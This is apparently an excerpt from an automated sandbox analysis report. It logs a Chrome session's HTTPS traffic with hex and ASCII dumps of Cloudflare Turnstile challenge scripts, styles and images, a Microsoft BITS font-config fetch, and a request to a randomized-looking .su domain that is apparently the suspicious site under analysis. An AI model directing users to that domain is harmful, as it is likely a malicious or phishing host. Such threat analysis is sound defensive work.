                                                          2024-01-24 14:33:58 UTC1369INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 3a 3a 61 66 74 65 72 20 7b 0a 20 20 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6c 65 66 74 3a 20 38 70 78 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 62 6f 72 64 65 72 3a 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 30 20 34 70 78 20 34 70 78 20 30 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 32 70 78 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63
                                                          Data Ascii: background-color: white;}.ctp-checkbox-label input:checked ~ .mark::after { top: 3px; left: 8px; transform: rotate(45deg) scale(1); border: solid #c44d0e; border-width: 0 4px 4px 0; border-radius: 0; width: 6px; height: 12px;}.ctp-chec
                                                          2024-01-24 14:33:58 UTC1369INData Raw: 69 6e 3a 20 35 70 78 20 31 36 70 78 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 71 72 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 66 61 69 6c 20 7b 0a 20 20 64 69 73 70 6c 61 79
                                                          Data Ascii: in: 5px 16px 0; padding-right: 0; text-align: right;}.size-compact #terms { text-align: right;}.size-compact #qr { text-align: center;}.size-compact #challenge-error-title { margin-top: 3px; width: auto;}.size-compact #fail { display
                                                          2024-01-24 14:33:58 UTC1369INData Raw: 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 66 61 69 6c 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 73 70 69 6e 6e 65 72 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 20 20 6d 61 72 67 69 6e
                                                          Data Ascii: rtl .size-compact #success-icon { left: 86px;}.rtl .size-compact #fail-icon { left: 86px;}.rtl .size-compact #spinner-icon { left: 86px;}.rtl .size-compact #expired-icon { left: 86px;}.rtl .size-compact #expired { margin-top: 0; margin


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.649730184.31.50.93443
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:33:58 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          Accept-Encoding: identity
                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                          Range: bytes=0-2147483646
                                                          User-Agent: Microsoft BITS/7.8
                                                          Host: fs.microsoft.com
                                                          2024-01-24 14:33:58 UTC530INHTTP/1.1 200 OK
                                                          Content-Type: application/octet-stream
                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                          ApiVersion: Distribute 1.1
                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                          X-Azure-Ref: 0URSoYgAAAABePpjyRlUAQrduejDbkqt8U0pDRURHRTA1MjAAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                          Cache-Control: public, max-age=27693
                                                          Date: Wed, 24 Jan 2024 14:33:58 GMT
                                                          Content-Length: 55
                                                          Connection: close
                                                          X-CID: 2
                                                          2024-01-24 14:33:58 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.649731104.17.2.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:33:58 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normal
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:33:58 UTC248INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:33:58 GMT
                                                          Content-Type: image/png
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cache-control: max-age=2629800, public
                                                          Server: cloudflare
                                                          CF-RAY: 84a8fe9eec254577-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:33:58 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                          Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                          2024-01-24 14:33:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.649732104.17.2.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:33:59 UTC710OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=84a8fe9b2b47507e HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normal
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:33:59 UTC335INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:33:59 GMT
                                                          Content-Type: application/javascript; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          Server: cloudflare
                                                          CF-RAY: 84a8fea1ca261d62-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:33:59 UTC1034INData Raw: 37 65 36 30 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 61 2c 66 77 2c 66 78 2c 66 79 2c 66 43 2c 66 47 2c 66 48 2c 67 35 2c 67 38 2c 67 39 2c 67 61 2c 67 62 2c 67 63 2c 67 64 2c 67 65 2c 67 66 2c 67 67 2c 67 68 2c 67 69 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 5a 2c 68 64 2c 68 71 2c 68 76 2c 68 77 2c 68 47 2c 68 50 2c 68 54 2c 69 30 2c 69 34 2c
                                                          Data Ascii: 7e60window._cf_chl_opt.uaO=false;~function(ia,fw,fx,fy,fC,fG,fH,g5,g8,g9,ga,gb,gc,gd,ge,gf,gg,gh,gi,gj,gk,gl,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gZ,hd,hq,hv,hw,hG,hP,hT,i0,i4,
                                                          2024-01-24 14:33:59 UTC1369INData Raw: 3d 7b 7d 2c 6e 5b 69 63 28 36 33 39 29 5d 3d 66 5b 69 63 28 34 32 35 29 5d 2c 73 3d 6e 2c 66 5b 69 63 28 31 34 33 30 29 5d 3d 3d 3d 66 5b 69 63 28 31 34 33 30 29 5d 3f 68 5e 3d 6a 5b 69 63 28 31 30 31 31 29 5d 28 6d 29 3a 28 68 3d 6c 7c 7c 66 5b 69 63 28 31 33 38 32 29 5d 2c 6d 28 6b 2c 66 75 6e 63 74 69 6f 6e 28 76 2c 69 64 29 7b 69 64 3d 69 63 2c 76 5b 69 64 28 36 39 35 29 5d 5b 69 64 28 31 30 36 38 29 5d 3d 6d 2c 76 5b 69 64 28 36 39 35 29 5d 5b 69 64 28 31 33 36 33 29 5d 3d 73 5b 69 64 28 36 33 39 29 5d 7d 29 29 7d 29 2c 63 3d 66 77 5b 69 62 28 31 35 37 34 29 5d 28 63 29 2c 69 3d 5b 5d 2c 67 3d 2d 31 3b 21 66 5b 69 62 28 33 33 30 29 5d 28 69 73 4e 61 4e 2c 6b 3d 63 5b 69 62 28 31 30 31 31 29 5d 28 2b 2b 67 29 29 3b 69 5b 69 62 28 38 32 32 29 5d 28 53
                                                          Data Ascii: ={},n[ic(639)]=f[ic(425)],s=n,f[ic(1430)]===f[ic(1430)]?h^=j[ic(1011)](m):(h=l||f[ic(1382)],m(k,function(v,id){id=ic,v[id(695)][id(1068)]=m,v[id(695)][id(1363)]=s[id(639)]}))}),c=fw[ib(1574)](c),i=[],g=-1;!f[ib(330)](isNaN,k=c[ib(1011)](++g));i[ib(822)](S
                                                          2024-01-24 14:33:59 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 50 66 72 46 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 64 6c 76 56 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 75 72 72 6c 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 50 74 6b 64 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 4c 47 50 72 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 71 69 59 59 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 64 7a 6e 57 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27
                                                          Data Ascii: {return h>i},'PfrFc':function(h,i){return h(i)},'dlvVC':function(h,i){return h-i},'urrlb':function(h,i){return h>i},'PtkdQ':function(h,i){return i|h},'LGPrO':function(h,i){return h<<i},'qiYYY':function(h,i){return i==h},'dznWH':function(h,i){return h-i},'
                                                          2024-01-24 14:33:59 UTC1369INData Raw: 48 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 6a 31 29 7b 72 65 74 75 72 6e 20 6a 31 3d 69 5a 2c 64 5b 6a 31 28 32 30 39 30 29 5d 28 4f 2c 50 29 7d 2c 27 45 61 44 78 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 2b 50 7d 2c 27 4c 52 75 68 49 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 5e 50 7d 2c 27 46 79 48 51 61 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 6a 32 29 7b 72 65 74 75 72 6e 20 6a 32 3d 69 5a 2c 64 5b 6a 32 28 37 39 30 29 5d 28 4f 2c 50 29 7d 2c 27 53 48 6e 59 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 6a 33 29 7b 72 65 74 75 72 6e 20 6a 33 3d 69 5a 2c 64 5b 6a 33 28 36 38 39 29 5d 28 4f 2c 50 29 7d 2c 27 4b 4a 58 7a 70 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75
                                                          Data Ascii: H':function(O,P,j1){return j1=iZ,d[j1(2090)](O,P)},'EaDxm':function(O,P){return O+P},'LRuhI':function(O,P){return O^P},'FyHQa':function(O,P,j2){return j2=iZ,d[j2(790)](O,P)},'SHnYJ':function(O,P,j3){return j3=iZ,d[j3(689)](O,P)},'KJXzp':function(O,P){retu
                                                          2024-01-24 14:33:59 UTC1369INData Raw: 29 5d 28 53 74 72 69 6e 67 2c 4c 29 29 7d 69 66 28 64 5b 69 5a 28 31 39 37 36 29 5d 28 27 27 2c 44 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 69 5a 28 31 37 35 34 29 5d 5b 69 5a 28 39 33 38 29 5d 5b 69 5a 28 31 34 38 39 29 5d 28 43 2c 44 29 29 7b 69 66 28 69 5a 28 31 34 31 34 29 3d 3d 3d 69 5a 28 31 34 39 31 29 29 7b 69 66 28 4b 5b 69 5a 28 31 34 36 39 29 5d 5b 69 5a 28 38 37 39 29 5d 3d 21 21 5b 5d 2c 6f 28 29 3d 3d 3d 31 29 72 65 74 75 72 6e 20 76 6f 69 64 28 66 28 29 2c 73 5b 69 5a 28 31 38 39 32 29 5d 28 78 2c 69 5a 28 38 30 33 29 2c 69 5a 28 33 36 30 29 29 29 3b 6f 28 73 5b 69 5a 28 39 38 39 29 5d 29 2c 73 5b 69 5a 28 31 39 37 30 29 5d 28 73 2c 73 5b 69 5a 28 31 32 30 36 29 5d 29 2c 43 28 29 2c 65 28 69 5a 28 31 36 36 36 29 29 7d 65 6c 73 65 7b 69 66 28
                                                          Data Ascii: )](String,L))}if(d[iZ(1976)]('',D)){if(Object[iZ(1754)][iZ(938)][iZ(1489)](C,D)){if(iZ(1414)===iZ(1491)){if(K[iZ(1469)][iZ(879)]=!![],o()===1)return void(f(),s[iZ(1892)](x,iZ(803),iZ(360)));o(s[iZ(989)]),s[iZ(1970)](s,s[iZ(1206)]),C(),e(iZ(1666))}else{if(
                                                          2024-01-24 14:33:59 UTC1369INData Raw: 69 5a 28 31 39 37 29 5d 28 47 2c 48 29 3b 4a 2b 3d 4b 5b 74 68 69 73 2e 68 5b 37 35 2e 38 37 5e 74 68 69 73 2e 67 5d 5b 33 5d 5e 73 5b 69 5a 28 31 32 31 37 29 5d 28 74 68 69 73 2e 68 5b 37 35 2e 30 39 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 69 5a 28 31 30 31 31 29 5d 28 74 68 69 73 2e 68 5b 37 35 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2d 31 31 37 2c 32 35 36 29 26 32 35 35 2e 38 31 5e 32 33 38 2e 31 32 5d 2c 49 2b 2b 29 3b 66 6f 72 28 4c 3d 74 68 69 73 2e 68 5b 73 5b 69 5a 28 31 38 32 30 29 5d 28 37 35 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 73 5b 69 5a 28 31 39 34 37 29 5d 28 73 5b 69 5a 28 31 32 31 37 29 5d 28 73 5b 69 5a 28 31 34 37 37 29 5d 28 74 68 69 73 2e 68 5b 73 5b 69 5a 28 31 38 32 30 29 5d 28 37 35 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 69 5a 28
                                                          Data Ascii: iZ(197)](G,H);J+=K[this.h[75.87^this.g][3]^s[iZ(1217)](this.h[75.09^this.g][1][iZ(1011)](this.h[75^this.g][0]++)-117,256)&255.81^238.12],I++);for(L=this.h[s[iZ(1820)](75,this.g)][3]^s[iZ(1947)](s[iZ(1217)](s[iZ(1477)](this.h[s[iZ(1820)](75,this.g)][1][iZ(
                                                          2024-01-24 14:33:59 UTC1369INData Raw: 31 32 33 34 29 5d 28 30 2c 4b 29 26 26 28 4b 3d 6f 2c 4a 3d 64 5b 6a 36 28 31 39 36 33 29 5d 28 73 2c 4c 2b 2b 29 29 2c 4d 7c 3d 64 5b 6a 36 28 31 30 30 36 29 5d 28 64 5b 6a 36 28 39 34 35 29 5d 28 30 2c 51 29 3f 31 3a 30 2c 49 29 2c 49 3c 3c 3d 31 29 3b 52 3d 65 28 4d 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 6a 36 28 31 32 32 30 29 5d 28 32 2c 31 36 29 2c 49 3d 31 3b 64 5b 6a 36 28 31 38 36 36 29 5d 28 49 2c 4e 29 3b 51 3d 4b 26 4a 2c 4b 3e 3e 3d 31 2c 4b 3d 3d 30 26 26 28 4b 3d 6f 2c 4a 3d 73 28 4c 2b 2b 29 29 2c 4d 7c 3d 49 2a 28 30 3c 51 3f 31 3a 30 29 2c 49 3c 3c 3d 31 29 3b 52 3d 64 5b 6a 36 28 32 39 30 29 5d 28 65 2c 4d 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72
                                                          Data Ascii: 1234)](0,K)&&(K=o,J=d[j6(1963)](s,L++)),M|=d[j6(1006)](d[j6(945)](0,Q)?1:0,I),I<<=1);R=e(M);break;case 1:for(M=0,N=Math[j6(1220)](2,16),I=1;d[j6(1866)](I,N);Q=K&J,K>>=1,K==0&&(K=o,J=s(L++)),M|=I*(0<Q?1:0),I<<=1);R=d[j6(290)](e,M);break;case 2:return''}for
                                                          2024-01-24 14:33:59 UTC1369INData Raw: 5b 6a 38 28 31 34 36 39 29 5d 5b 6a 38 28 31 36 34 36 29 5d 28 29 2c 66 77 5b 6a 38 28 35 38 31 29 5d 3d 21 21 5b 5d 2c 66 77 5b 65 5b 6a 38 28 34 37 38 29 5d 5d 5b 6a 38 28 38 30 39 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 6a 38 28 34 38 32 29 2c 27 77 69 64 67 65 74 49 64 27 3a 66 77 5b 6a 38 28 36 30 35 29 5d 5b 6a 38 28 32 37 34 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 6a 38 28 36 33 38 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 66 77 5b 6a 38 28 36 30 35 29 5d 5b 6a 38 28 31 35 34 31 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 66 77 5b 6a 38 28 36 30 35 29 5d 5b 6a 38 28 31 36 36 39 29 5d 2c 27 63 6f 64 65 27 3a 6a 38 28 32 30 38 30 29 2c 27 72 63 56 27 3a 66 77 5b 6a 38 28 36 30 35 29 5d 5b 6a 38 28 31 38 30 32 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d
                                                          Data Ascii: [j8(1469)][j8(1646)](),fw[j8(581)]=!![],fw[e[j8(478)]][j8(809)]({'source':j8(482),'widgetId':fw[j8(605)][j8(274)],'event':e[j8(638)],'cfChlOut':fw[j8(605)][j8(1541)],'cfChlOutS':fw[j8(605)][j8(1669)],'code':j8(2080),'rcV':fw[j8(605)][j8(1802)]},'*'))},g)}
                                                          2024-01-24 14:33:59 UTC1369INData Raw: 39 28 35 36 39 29 5d 3d 6a 39 28 31 38 39 38 29 2c 6c 5b 6a 39 28 31 36 35 33 29 5d 5b 6a 39 28 31 33 35 31 29 5d 28 6a 39 28 31 38 39 38 29 29 29 3a 77 5b 6a 39 28 35 36 39 29 5d 3d 6a 5b 6a 39 28 35 38 38 29 5d 7d 63 61 74 63 68 28 42 29 7b 7d 7d 2c 66 77 5b 69 61 28 31 30 32 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 2c 67 2c 68 2c 6a 61 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 28 6a 61 3d 69 61 2c 69 3d 7b 7d 2c 69 5b 6a 61 28 31 39 36 34 29 5d 3d 6a 61 28 31 34 36 36 29 2c 69 5b 6a 61 28 35 34 35 29 5d 3d 6a 61 28 33 39 33 29 2c 69 5b 6a 61 28 31 33 36 38 29 5d 3d 6a 61 28 31 38 32 39 29 2c 69 5b 6a 61 28 32 30 30 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 69 5b 6a 61 28 38 32 35 29 5d 3d 6a 61 28
                                                          Data Ascii: 9(569)]=j9(1898),l[j9(1653)][j9(1351)](j9(1898))):w[j9(569)]=j[j9(588)]}catch(B){}},fw[ia(1027)]=function(d,e,f,g,h,ja,i,j,k,l,m){(ja=ia,i={},i[ja(1964)]=ja(1466),i[ja(545)]=ja(393),i[ja(1368)]=ja(1829),i[ja(2008)]=function(n,o){return n+o},i[ja(825)]=ja(
                                                          2024-01-24 14:33:59 UTC1369INData Raw: 3d 6a 67 2c 66 77 5b 6a 68 28 31 31 32 30 29 5d 28 63 2c 64 2c 65 2b 31 29 7d 2c 28 65 2b 31 29 2a 32 35 30 29 7d 2c 69 3d 6e 65 77 20 66 77 5b 28 6a 66 28 34 38 31 29 29 5d 28 29 2c 21 69 29 72 65 74 75 72 6e 3b 6a 3d 66 5b 6a 66 28 31 37 35 35 29 5d 2c 69 5b 6a 66 28 33 35 33 29 5d 28 6a 2c 63 2c 21 21 5b 5d 29 2c 69 5b 6a 66 28 31 38 38 30 29 5d 3d 66 5b 6a 66 28 31 34 35 39 29 5d 28 32 35 30 30 2c 66 5b 6a 66 28 31 37 30 31 29 5d 28 31 2c 65 29 29 2c 69 5b 6a 66 28 31 32 36 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6a 69 29 7b 6a 69 3d 6a 66 2c 66 5b 6a 69 28 39 38 38 29 5d 28 68 29 7d 2c 69 5b 6a 66 28 31 32 34 37 29 5d 28 6a 66 28 31 37 31 32 29 2c 6a 66 28 31 33 30 38 29 29 2c 69 5b 6a 66 28 31 32 34 37 29 5d 28 66 5b 6a 66 28 35 37 39 29 5d 2c 66 77
                                                          Data Ascii: =jg,fw[jh(1120)](c,d,e+1)},(e+1)*250)},i=new fw[(jf(481))](),!i)return;j=f[jf(1755)],i[jf(353)](j,c,!![]),i[jf(1880)]=f[jf(1459)](2500,f[jf(1701)](1,e)),i[jf(1268)]=function(ji){ji=jf,f[ji(988)](h)},i[jf(1247)](jf(1712),jf(1308)),i[jf(1247)](f[jf(579)],fw


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.649733104.17.3.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:33:59 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:33:59 UTC248INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:33:59 GMT
                                                          Content-Type: image/png
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cache-control: max-age=2629800, public
                                                          Server: cloudflare
                                                          CF-RAY: 84a8fea49e0406ff-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:33:59 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                          Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                          2024-01-24 14:33:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.649721172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:33:59 UTC679OUTGET /favicon.ico HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:00 UTC669INHTTP/1.1 404 Not Found
                                                          Date: Wed, 24 Jan 2024 14:34:00 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cache-control: private, no-cache, max-age=0
                                                          pragma: no-cache
                                                          vary: Accept-Encoding
                                                          CF-Cache-Status: BYPASS
